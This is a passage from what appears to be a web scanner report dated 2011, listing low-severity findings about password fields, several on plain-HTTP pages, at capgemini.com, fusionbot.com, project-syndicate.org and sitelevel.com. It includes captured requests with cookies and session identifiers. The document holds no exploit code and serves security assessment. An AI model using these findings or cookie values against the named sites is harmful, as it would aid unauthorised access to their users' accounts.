<td><input class="password" id="session[password]" name="session[password]" tabindex="2" type="password" value="" /></td>
...[SNIP]...

8.26. http://www.capgemini.com/registration/register/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.capgemini.com
Path:   /registration/register/

Request

GET /registration/register/?edit=1 HTTP/1.1
Host: www.capgemini.com
Proxy-Connection: keep-alive
Referer: http://www.capgemini.com/my-capgemini/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __llat=aHR0cDovL3d3dy5jYXBnZW1pbmkuY29tLz9jb21wYW55PWNhcGdlbWluaSZkYXRlPU1vbiwgMjggRmViIDIwMTEgMTc6NTA6MTYgVVRDJmlwYWRkcj1Ob25lJmJyb3dzZXI9TmV0c2NhcGUlMjA1LjAlMjAlMjhXaW5kb3dzJTNCJTIwVSUzQiUyMFdpbmRvd3MlMjBOVCUyMDYuMSUzQiUyMGVuLVVTJTI5JTIwQXBwbGVXZWJLaXQvNTM0LjEzJTIwJTI4S0hUTUwlMkMlMjBsaWtlJTIwR2Vja28lMjklMjBDaHJvbWUvOS4wLjU5Ny45OCUyMFNhZmFyaS81MzQuMTMmcmVmZXJyZXI9JmNhbXBhaWduPVdlYlNpdGUgTGVhZHM=; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: nginx/0.6.35
Date: Mon, 28 Feb 2011 17:53:49 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Powered-By: PHP/5.2.8
Set-Cookie: PHPSESSID=13dcd029682bf5b7edb08e84b77c1646; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-Control: no-store
Edge-Control: no-store
Content-Length: 51150

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--[if IE 6]>
<html class="msie6" xmlns="http://www.w3.org/1999/xh
...[SNIP]...
</div>
<form action="/registration/register/" method="post" class="form-verify"><input type="hidden" name="edit" value="1" />
...[SNIP]...
</label>
<input name="password" id="f-password-1" type="password">
</div>
...[SNIP]...
</label>
<input name="confirm_password" id="f-password-2" type="password">
</div>
...[SNIP]...

8.27. https://www.fusionbot.com/login.asp  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.fusionbot.com
Path:   /login.asp

Request

GET /login.asp HTTP/1.1
Host: www.fusionbot.com
Connection: keep-alive
Referer: http://www.fusionbot.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fusionbot=fbdirect; ASPSESSIONIDCARBRRAC=FLIHDGPCIMMCCOKDILBOJKBN; __utmz=44343995.1298944898.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44343995.1654407764.1298944898.1298944898.1298944898.1; __utmc=44343995; __utmb=44343995.1.10.1298944898

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Tue, 01 Mar 2011 02:04:10 GMT
Pragma: no-cache
Last-Modified: Sun, 27 Feb 2011 15:16:11 GMT
Content-Length: 27595
Content-Type: text/html
Expires: Tue, 01 Mar 2011 02:03:11 GMT
Cache-control: no-cache


<html>
<head>

<link rel="stylesheet" href="fb.css">

<script language="javascript" src="script/fb.js" type="text/javascript"></script>

<link rel=stylesheet href="https://www.fusionbot.com/s
...[SNIP]...
<table border=0 width=95%>
<form method=post action=login_test.asp>
<tr>
...[SNIP]...
<td height=25 width=70% class=fbtc><input type=password name=password size=12 maxlength=12 class=fbtc></td>
...[SNIP]...

8.28. http://www.project-syndicate.org/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.project-syndicate.org
Path:   /

Request

GET / HTTP/1.1
Host: www.project-syndicate.org
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Sat, 26 Feb 2011 02:18:10 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Sun, 27 Feb 2011 02:18:10 GMT
X-Varnish: 311664350
Age: 0
Via: 1.1 varnish
Connection: keep-alive
Content-Length: 106362

<!DOCTYPE html>
<html class="no-js"> <head>
<!-- new tracker #2 head //-->
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
<!-- //end new tracker #2 head //-->


...[SNIP]...
</div>
<form onsubmit="return verify_login('login_form');" id="login_form" method="post" action="/test/verify_login" >
<fieldset>
...[SNIP]...
<td align="right"><input type="password" id="password" name="password" size="15" /></td>
...[SNIP]...

8.29. http://www.project-syndicate.org/commentary/ashour1/English  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.project-syndicate.org
Path:   /commentary/ashour1/English

Request

GET /commentary/ashour1/English HTTP/1.1
Host: www.project-syndicate.org
Proxy-Connection: keep-alive
Referer: http://www.project-syndicate.org/series_metacategory/1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=205253329.1298773081.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1045503868-1298773082174; _jsuid=3082234540994859644; hash=SCll5XTF882lk; _chartbeat2=occw3y7oz7bpai8h; __unam=30dea60-12e64e877f0-4b740973-4; __utma=205253329.820591158.1298773079.1298773079.1298773079.1; __utmc=205253329; __utmb=205253329.4.10.1298773079; _bizo_cksm_crc32=CF9B3698; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; _bizo_cksm=AC1D22CE7AF9EE3E; _bizo_np_stats=337%3D122%2C337%3D122%2C337%3D147%2C255%3D158%2C

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Sat, 26 Feb 2011 02:20:04 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Sun, 27 Feb 2011 02:20:04 GMT
X-Varnish: 311665510
Age: 0
Via: 1.1 varnish
Connection: keep-alive
Content-Length: 77563

<!DOCTYPE html>
<html class="no-js"> <head>
<!-- new tracker #2 head //-->
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
<!-- //end new tracker #2 head //-->


...[SNIP]...
</div>
<form onsubmit="return verify_login('login_form');" id="login_form" method="post" action="/test/verify_login" >
<fieldset>
...[SNIP]...
<td align="right"><input type="password" id="password" name="password" size="15" /></td>
...[SNIP]...

8.30. http://www.project-syndicate.org/commentary/ashour1/English  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.project-syndicate.org
Path:   /commentary/ashour1/English

Request

GET /commentary/ashour1/English HTTP/1.1
Host: www.project-syndicate.org
Proxy-Connection: keep-alive
Referer: http://www.project-syndicate.org/series_metacategory/1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=205253329.1298773081.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1045503868-1298773082174; _jsuid=3082234540994859644; hash=SCll5XTF882lk; _chartbeat2=occw3y7oz7bpai8h; __unam=30dea60-12e64e877f0-4b740973-4; __utma=205253329.820591158.1298773079.1298773079.1298773079.1; __utmc=205253329; __utmb=205253329.4.10.1298773079; _bizo_cksm_crc32=CF9B3698; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; _bizo_cksm=AC1D22CE7AF9EE3E; _bizo_np_stats=337%3D122%2C337%3D122%2C337%3D147%2C255%3D158%2C

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Sat, 26 Feb 2011 02:20:04 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Sun, 27 Feb 2011 02:20:04 GMT
X-Varnish: 311665510
Age: 0
Via: 1.1 varnish
Connection: keep-alive
Content-Length: 77563

<!DOCTYPE html>
<html class="no-js"> <head>
<!-- new tracker #2 head //-->
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
<!-- //end new tracker #2 head //-->


...[SNIP]...
<div class="middle">
<form name="slf" id="slf" action="/" method="post" onsubmit="return verify_login('slf')">
<div class="login_error" id="slf_error">
...[SNIP]...
<br /><input type="password" name="password" value="" />
<td>
...[SNIP]...

8.31. http://www.project-syndicate.org/commentary/fischer60/English  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.project-syndicate.org
Path:   /commentary/fischer60/English

Request

GET /commentary/fischer60/English HTTP/1.1
Host: www.project-syndicate.org
Proxy-Connection: keep-alive
Referer: http://www.project-syndicate.org/contributor/886
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=205253329.1298773081.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1045503868-1298773082174; _jsuid=3082234540994859644; hash=SCll5XTF882lk; _chartbeat2=occw3y7oz7bpai8h; __unam=30dea60-12e64e877f0-4b740973-8; __utma=205253329.820591158.1298773079.1298773079.1298773079.1; __utmc=205253329; __utmb=205253329.8.10.1298773079; _bizo_cksm_crc32=41555F95; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; _bizo_cksm=AC1D22CE7AF9EE3E; _bizo_np_stats=221%3D148%2C

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Sat, 26 Feb 2011 02:21:01 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Sun, 27 Feb 2011 02:21:01 GMT
X-Varnish: 311666286
Age: 0
Via: 1.1 varnish
Connection: keep-alive
Content-Length: 79920

<!DOCTYPE html>
<html class="no-js"> <head>
<!-- new tracker #2 head //-->
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
<!-- //end new tracker #2 head //-->


...[SNIP]...
<div class="middle">
<form name="slf" id="slf" action="/" method="post" onsubmit="return verify_login('slf')">
<div class="login_error" id="slf_error">
...[SNIP]...
<br /><input type="password" name="password" value="" />
<td>
...[SNIP]...

8.32. http://www.project-syndicate.org/commentary/fischer60/English  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.project-syndicate.org
Path:   /commentary/fischer60/English

Request

GET /commentary/fischer60/English HTTP/1.1
Host: www.project-syndicate.org
Proxy-Connection: keep-alive
Referer: http://www.project-syndicate.org/contributor/886
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=205253329.1298773081.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1045503868-1298773082174; _jsuid=3082234540994859644; hash=SCll5XTF882lk; _chartbeat2=occw3y7oz7bpai8h; __unam=30dea60-12e64e877f0-4b740973-8; __utma=205253329.820591158.1298773079.1298773079.1298773079.1; __utmc=205253329; __utmb=205253329.8.10.1298773079; _bizo_cksm_crc32=41555F95; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; _bizo_cksm=AC1D22CE7AF9EE3E; _bizo_np_stats=221%3D148%2C

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Sat, 26 Feb 2011 02:21:01 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Sun, 27 Feb 2011 02:21:01 GMT
X-Varnish: 311666286
Age: 0
Via: 1.1 varnish
Connection: keep-alive
Content-Length: 79920

<!DOCTYPE html>
<html class="no-js"> <head>
<!-- new tracker #2 head //-->
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
<!-- //end new tracker #2 head //-->


...[SNIP]...
</div>
<form onsubmit="return verify_login('login_form');" id="login_form" method="post" action="/test/verify_login" >
<fieldset>
...[SNIP]...
<td align="right"><input type="password" id="password" name="password" size="15" /></td>
...[SNIP]...

8.33. http://www.project-syndicate.org/contributor/1608  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.project-syndicate.org
Path:   /contributor/1608

Request

GET /contributor/1608 HTTP/1.1
Host: www.project-syndicate.org
Proxy-Connection: keep-alive
Referer: http://www.project-syndicate.org/series/finance_in_the_21st_century/description
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=205253329.1298773081.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1045503868-1298773082174; _jsuid=3082234540994859644; hash=SCll5XTF882lk; __unam=30dea60-12e64e877f0-4b740973-10; __utma=205253329.820591158.1298773079.1298773079.1298773079.1; __utmc=205253329; _bizo_cksm_crc32=4FDF11E; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; _bizo_cksm=AC1D22CE7AF9EE3E; _bizo_np_stats=597%3D250%2C91%3D254%2C160%3D499%2C451%3D1301%2C; _chartbeat2=occw3y7oz7bpai8h

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Sat, 26 Feb 2011 16:52:21 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Sun, 27 Feb 2011 16:52:21 GMT
X-Varnish: 311980082
Age: 0
Via: 1.1 varnish
Connection: keep-alive
Content-Length: 125242

<!DOCTYPE html>
<html class="no-js"> <head>
<!-- new tracker #2 head //-->
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
<!-- //end new tracker #2 head //-->


...[SNIP]...
</div>
<form onsubmit="return verify_login('login_form');" id="login_form" method="post" action="/test/verify_login" >
<fieldset>
...[SNIP]...
<td align="right"><input type="password" id="password" name="password" size="15" /></td>
...[SNIP]...

8.34. http://www.project-syndicate.org/contributor/886  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.project-syndicate.org
Path:   /contributor/886

Request

GET /contributor/886 HTTP/1.1
Host: www.project-syndicate.org
Proxy-Connection: keep-alive
Referer: http://www.project-syndicate.org/series_metacategory/3
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=205253329.1298773081.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1045503868-1298773082174; _jsuid=3082234540994859644; hash=SCll5XTF882lk; _chartbeat2=occw3y7oz7bpai8h; __unam=30dea60-12e64e877f0-4b740973-7; __utma=205253329.820591158.1298773079.1298773079.1298773079.1; __utmc=205253329; __utmb=205253329.7.10.1298773079; _bizo_cksm_crc32=7361F533; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; _bizo_cksm=AC1D22CE7AF9EE3E; _bizo_np_stats=428%3D76%2C320%3D77%2C107%3D76%2C217%3D148%2C

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Sat, 26 Feb 2011 02:20:52 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Sun, 27 Feb 2011 02:20:52 GMT
X-Varnish: 311666147
Age: 0
Via: 1.1 varnish
Connection: keep-alive
Content-Length: 111707

<!DOCTYPE html>
<html class="no-js"> <head>
<!-- new tracker #2 head //-->
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
<!-- //end new tracker #2 head //-->


...[SNIP]...
</div>
<form onsubmit="return verify_login('login_form');" id="login_form" method="post" action="/test/verify_login" >
<fieldset>
...[SNIP]...
<td align="right"><input type="password" id="password" name="password" size="15" /></td>
...[SNIP]...

8.35. http://www.project-syndicate.org/register  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.project-syndicate.org
Path:   /register

Request

GET /register HTTP/1.1
Host: www.project-syndicate.org
Proxy-Connection: keep-alive
Referer: http://www.project-syndicate.org/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __unam=30dea60-12e64e877f0-4b740973-1; __utmz=205253329.1298773081.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=205253329.820591158.1298773079.1298773079.1298773079.1; __utmc=205253329; __utmb=205253329.1.10.1298773079; _bizo_cksm_crc32=3975EE35; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; _bizo_cksm=AC1D22CE7AF9EE3E; __qca=P0-1045503868-1298773082174; _jsuid=3082234540994859644; _bizo_np_stats=221%3D1047%2C315%3D1403%2C; _chartbeat2=occw3y7oz7bpai8h

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Sat, 26 Feb 2011 02:18:24 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Sun, 27 Feb 2011 02:18:24 GMT
X-Varnish: 311664528
Age: 0
Via: 1.1 varnish
Connection: keep-alive
Content-Length: 66955

<!DOCTYPE html>
<html class="no-js"> <head>
<!-- new tracker #2 head //-->
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
<!-- //end new tracker #2 head //-->


...[SNIP]...
</div> <form name="register_form" method="post" action="/process_register_form">
<input type="hidden" name="rm" value="prf" />
...[SNIP]...
<td><input type="password" maxlength="255" name="password" /></td>
...[SNIP]...
<td><input type="password" maxlength="255" name="vpassword" /></td>
...[SNIP]...

8.36. http://www.project-syndicate.org/register  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.project-syndicate.org
Path:   /register

Request

GET /register HTTP/1.1
Host: www.project-syndicate.org
Proxy-Connection: keep-alive
Referer: http://www.project-syndicate.org/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __unam=30dea60-12e64e877f0-4b740973-1; __utmz=205253329.1298773081.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=205253329.820591158.1298773079.1298773079.1298773079.1; __utmc=205253329; __utmb=205253329.1.10.1298773079; _bizo_cksm_crc32=3975EE35; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; _bizo_cksm=AC1D22CE7AF9EE3E; __qca=P0-1045503868-1298773082174; _jsuid=3082234540994859644; _bizo_np_stats=221%3D1047%2C315%3D1403%2C; _chartbeat2=occw3y7oz7bpai8h

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Sat, 26 Feb 2011 02:18:24 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Sun, 27 Feb 2011 02:18:24 GMT
X-Varnish: 311664528
Age: 0
Via: 1.1 varnish
Connection: keep-alive
Content-Length: 66955

<!DOCTYPE html>
<html class="no-js"> <head>
<!-- new tracker #2 head //-->
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
<!-- //end new tracker #2 head //-->


...[SNIP]...
</div>
<form onsubmit="return verify_login('login_form');" id="login_form" method="post" action="/test/verify_login" >
<fieldset>
...[SNIP]...
<td align="right"><input type="password" id="password" name="password" size="15" /></td>
...[SNIP]...

8.37. http://www.project-syndicate.org/series/finance_in_the_21st_century/description  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.project-syndicate.org
Path:   /series/finance_in_the_21st_century/description

Request

GET /series/finance_in_the_21st_century/description HTTP/1.1
Host: www.project-syndicate.org
Proxy-Connection: keep-alive
Referer: http://www.project-syndicate.org/commentary/fischer60/English
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=205253329.1298773081.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1045503868-1298773082174; _jsuid=3082234540994859644; hash=SCll5XTF882lk; __unam=30dea60-12e64e877f0-4b740973-9; __utma=205253329.820591158.1298773079.1298773079.1298773079.1; __utmc=205253329; __utmb=205253329.9.10.1298773079; _bizo_cksm_crc32=D49EAE15; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; _bizo_cksm=AC1D22CE7AF9EE3E; _bizo_np_stats=597%3D235%2C221%3D237%2C315%3D1189%2C; _chartbeat2=occw3y7oz7bpai8h

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Sat, 26 Feb 2011 02:21:12 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Sun, 27 Feb 2011 02:21:12 GMT
X-Varnish: 311666523
Age: 0
Via: 1.1 varnish
Connection: keep-alive
Content-Length: 124237

<!DOCTYPE html>
<html class="no-js"> <head>
<!-- new tracker #2 head //-->
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
<!-- //end new tracker #2 head //-->


...[SNIP]...
</div>
<form onsubmit="return verify_login('login_form');" id="login_form" method="post" action="/test/verify_login" >
<fieldset>
...[SNIP]...
<td align="right"><input type="password" id="password" name="password" size="15" /></td>
...[SNIP]...

8.38. http://www.project-syndicate.org/series_metacategory/1  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.project-syndicate.org
Path:   /series_metacategory/1

Request

GET /series_metacategory/1 HTTP/1.1
Host: www.project-syndicate.org
Proxy-Connection: keep-alive
Referer: http://www.project-syndicate.org/register
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=205253329.1298773081.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1045503868-1298773082174; _jsuid=3082234540994859644; __unam=30dea60-12e64e877f0-4b740973-3; __utma=205253329.820591158.1298773079.1298773079.1298773079.1; __utmc=205253329; __utmb=205253329.3.10.1298773079; _bizo_cksm_crc32=58EF95BD; hash=SCll5XTF882lk; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; _bizo_cksm=AC1D22CE7AF9EE3E; _bizo_np_stats=673%3D105%2C673%3D106%2C160%3D114%2C673%3D119%2C; _chartbeat2=occw3y7oz7bpai8h

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Sat, 26 Feb 2011 02:19:58 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Sun, 27 Feb 2011 02:19:58 GMT
X-Varnish: 311665446
Age: 0
Via: 1.1 varnish
Connection: keep-alive
Content-Length: 145198

<!DOCTYPE html>
<html class="no-js"> <head>
<!-- new tracker #2 head //-->
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
<!-- //end new tracker #2 head //-->


...[SNIP]...
</div>
<form onsubmit="return verify_login('login_form');" id="login_form" method="post" action="/test/verify_login" >
<fieldset>
...[SNIP]...
<td align="right"><input type="password" id="password" name="password" size="15" /></td>
...[SNIP]...

8.39. http://www.project-syndicate.org/series_metacategory/3  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.project-syndicate.org
Path:   /series_metacategory/3

Request

GET /series_metacategory/3 HTTP/1.1
Host: www.project-syndicate.org
Proxy-Connection: keep-alive
Referer: http://www.project-syndicate.org/commentary/ashour1/English
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=205253329.1298773081.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1045503868-1298773082174; _jsuid=3082234540994859644; hash=SCll5XTF882lk; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; _bizo_cksm=AC1D22CE7AF9EE3E; _chartbeat2=occw3y7oz7bpai8h; __unam=30dea60-12e64e877f0-4b740973-6; __utma=205253329.820591158.1298773079.1298773079.1298773079.1; __utmc=205253329; __utmb=205253329.6.10.1298773079; _bizo_np_stats=; _bizo_cksm_crc32=9EC816CB

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Sat, 26 Feb 2011 02:20:44 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Sun, 27 Feb 2011 02:20:44 GMT
X-Varnish: 311666020
Age: 0
Via: 1.1 varnish
Connection: keep-alive
Content-Length: 150772

<!DOCTYPE html>
<html class="no-js"> <head>
<!-- new tracker #2 head //-->
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
<!-- //end new tracker #2 head //-->


...[SNIP]...
</div>
<form onsubmit="return verify_login('login_form');" id="login_form" method="post" action="/test/verify_login" >
<fieldset>
...[SNIP]...
<td align="right"><input type="password" id="password" name="password" size="15" /></td>
...[SNIP]...

8.40. http://www.sitelevel.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.sitelevel.com
Path:   /

Request

GET / HTTP/1.1
Host: www.sitelevel.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 01 Mar 2011 02:02:06 GMT
Server: Apache/2.2.3 (CentOS)
Accept-Ranges: bytes
Content-Length: 47926
Connection: close
Content-Type: text/html; charset=UTF-8

<html>

<head><LINK REL="STYLESHEET" TYPE="text/css" HREF="/sl_style.css">
<meta http-equiv="Content-Language" content="en-us">
<meta http-equiv="Content-Type" content="text/html; charset=windows-
...[SNIP]...
<!--start login form--><form method="POST" action="https://www.sitelevel.com/member/login/" name="form_login" onSubmit='setremember();'>
<input type="hidden" name="submit" value="1">
...[SNIP]...
<br>
<input type="password" name="password" size="21" class="gray_box_text_field"><br>
...[SNIP]...

8.41. http://www.watchmouse.com/en/  previous  next

Summary

Severity:   Low
Confidence:   Certain
